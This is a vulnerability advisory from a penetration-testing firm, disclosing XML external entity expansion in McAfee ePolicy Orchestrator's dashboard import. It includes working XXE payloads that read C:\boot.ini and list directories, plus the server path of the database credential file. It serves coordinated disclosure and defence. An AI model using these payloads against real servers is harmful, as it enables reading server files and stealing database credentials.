McAfee ePolicy Orchestrator XML External Entity Expansion

`Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in  
Dashboard  
  
RedTeam Pentesting identified an XML external entity expansion  
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.  
Users with the ability to create new dashboards in the ePO web interface  
who exploit this vulnerability can read local files on the ePO server,  
including sensitive data like the ePO database configuration.  
  
  
Details  
=======  
  
Product: McAfee ePolicy Orchestrator  
Affected Versions: 4.6.7 and below  
Fixed Versions: 4.6.7 + hotfix 940148  
Vulnerability Type: XML External Entity Expansion  
Security Risk: high  
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx  
Vendor Status: hotfix released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001  
Advisory Status: public  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
McAfee ePO allows to centrally manage other systems, including deploying  
new software and collecting system information. Dashboards allow  
privileged users to view statistics and current data about ePO and  
associated systems.  
  
  
More Details  
============  
  
Users with access to McAfee ePO's web interface can have the permission  
to add new dashboards. Dashboard definitions can be exported as XML data  
and also be imported again. A basic XML dashboard definition looks like  
follows:  
  
<dashboard id="1">  
<name>RedTeam Pentesting</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
Importing a dashboard consists of uploading the XML data and confirming  
the import afterwards. On the confirmation page the dashboard's name  
defined in the XML tag "name" is shown.  
  
The ePO system allows to add a user-defined DTD to the XML data and  
therefore add additional entities, which will be expanded by the system.  
The following example results in an dashboard with the name "RedTeam  
Pentesting Entity":  
  
<?xml version="1.0"?>  
<!DOCTYPE dashboard [  
<!ENTITY redteam "RedTeam Pentesting Entity">  
]>  
<dashboard id="1">  
<name>&redteam;</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
It is also possible to specify external entities that for example point  
to local files on the ePO server. The entity will then be expanded to  
contain the file's content. This works as long as the file contents do  
not make the resulting XML data invalid. Data that cannot be read  
includes for example binary data or files containing XML data  
themselves.  
  
If the entity is used in the dashboard's name, the confirmation page  
shown when importing a dashboard displays the contents of the file.  
  
The following example XML data can be uploaded to read the file  
C:\boot.ini:  
  
<?xml version="1.0"?>  
<!DOCTYPE dashboard [  
<!ENTITY redteam SYSTEM "file:///c:/boot.ini">  
]>  
<dashboard id="1">  
<name>&redteam;</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
It is also possible to get directory listings by using a file URL that  
points to a directory, for example the C: drive:  
  
<!ENTITY redteam SYSTEM "file:///c:/">  
  
  
Workaround  
==========  
  
RedTeam Pentesting is not aware of any workarounds.  
  
  
Fix  
===  
  
McAfee has issued a hotfix[0] for version 4.6.7 that removes the  
vulnerability. An upgrade to the newer 5.x branch of the product will  
also resolve this problem.  
  
  
Security Risk  
=============  
  
The vulnerability is mitigated by the fact that users already need valid  
login credentials for the ePO system and the permission to create  
dashboards for a successful exploitation.  
  
It is still considered to be of a high risk potential however, as it  
gives attackers the opportunity to read potentially sensitive file  
contents on the server. This includes for example ePO's database  
credentials, which are typically stored in a file available at a path  
like the following:  
  
C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties  
  
The credentials in this file are encrypted with a static key that is  
publicly known and included for example in Metasploit[1].  
  
Depending on the actual network structure, it might be possible to use  
the decrypted credentials to read and alter the information in the ePO  
database. This might lead to a compromise of the clients that are  
managed by ePO.  
  
  
Timeline  
========  
  
2013-11-20 Vulnerability identified  
2013-11-22 Customer decided to coordinate disclosure with vendor  
2014-02-14 Vendor replied to customer  
2014-02-24 Vendor released hotfix for version 4.6.7 and a public  
Security Bulletin[0]  
2014-02-25 Advisory released  
  
  
References  
==========  
  
[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065  
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`